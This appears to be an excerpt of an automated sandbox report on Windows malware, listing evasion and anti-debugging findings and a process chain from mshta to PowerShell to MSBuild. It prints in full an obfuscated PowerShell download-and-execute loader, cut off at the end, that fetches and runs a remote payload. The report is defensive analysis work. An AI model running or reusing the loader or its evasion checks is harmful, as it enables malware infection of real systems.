                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: powershell.exe, 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-KQ
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3353Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6454Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: MSBuild.exe, 00000008.00000002.2940231574.0000000005C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllemen
                        Source: wscript.exe, 00000003.00000003.1739322666.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739105346.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1742695685.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002AD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1742218678.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1740585638.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738691504.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXn
                        Source: MSBuild.exe, 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                        Source: wscript.exe, 00000003.00000003.1739011670.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743609926.0000000002B54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002A54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vMCIE6kpe8bW6hPfP
                        Source: wscript.exe, 00000003.00000003.1739322666.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739105346.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1742695685.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002AD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1742218678.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1740585638.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738691504.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                        Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002A54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vMCIE6kpe8bW6hPfP.exe
                        Source: powershell.exe, 00000005.00000002.1867975144.0000000008071000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_010170B8 CheckRemoteDebuggerPresent,8_2_010170B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
                        Yara detected Powershell decode and execute
                        Source: Yara matchFile source: amsi32_7624.amsi.csv, type: OTHER
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi32_7624.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.batJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\octupole.vbs"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreakJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#bl#hg#a#bh#hu#cwb0#gu#z##g#d0#i##n#hq#e#b0#c4#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##2#gu#cwbh#gi#lw#3#de#lg#w#di#mg#u#dm#lg#y#dk#mq#v#c8#ogbw#hq#d#bo#cc#ow#k#hm#bgbp#hq#d#b5#c##pq#g#cq#zqb4#gg#yqb1#hm#d#bl#gq#i##t#hi#zqbw#gw#yqbj#gu#i##n#cm#jw#s#c##jwb0#cc#ow#k#hm#a#bv#hy#zqbs#ge#cgbk#c##pq#g#cc#a#b0#hq#c#bz#do#lw#v#de#m##w#dc#lgbm#gk#b#bl#g0#yqbp#gw#lgbj#g8#bq#v#ge#c#bp#c8#zgbp#gw#zq#v#gc#zqb0#d8#zgbp#gw#zqbr#gu#eq#9#eu#uwbz#fq#aqbu#fi#mwbp#d##mwbf#du#cqby#e0#bgbj#hk#eqbx#hq#wqbm#du#twbn#ey#vq#w#g0#yqbr#hg#tqb1#d##zqbq#he#ugbs#eo#tgbp#gm#tgbq#em#mw#2#ge#o#bu#di#agbh#gy#vwbu#dy#rgbf#ei#ag#1#hm#jgbw#gs#xwb2#gk#z##9#dm#n##y#dg#m##z#gq#mqbj#gm#n#bl#dm#yg#4#d##mq#3#dq#m##2#dy#nw#w#du#m##4#d##yq#1#gu#zg#n#ds#j#bv#hi#zwbh#g4#bwbs#ge#bgb0#gg#yqbu#hu#bq#g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#j#bz#hq#aqbs#gi#zqbu#gu#i##9#c##j#bv#hi#zwbh#g4#bwbs#ge#bgb0#gg#yqbu#hu#bq#u#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#cg#j#bz#gg#bwb2#gu#b#bh#hi#z##p#ds#j#bn#gu#cgb1#g4#z#bp#ge#b#bs#hk#i##9#c##wwbt#hk#cwb0#gu#bq#u#fq#zqb4#hq#lgbf#g4#ywbv#gq#aqbu#gc#xq#6#do#vqbu#ey#o##u#ec#zqb0#fm#d#by#gk#bgbn#cg#j#bz#hq#aqbs#gi#zqbu#gu#kq#7#cq#zqb0#gg#bqbv#hy#bwb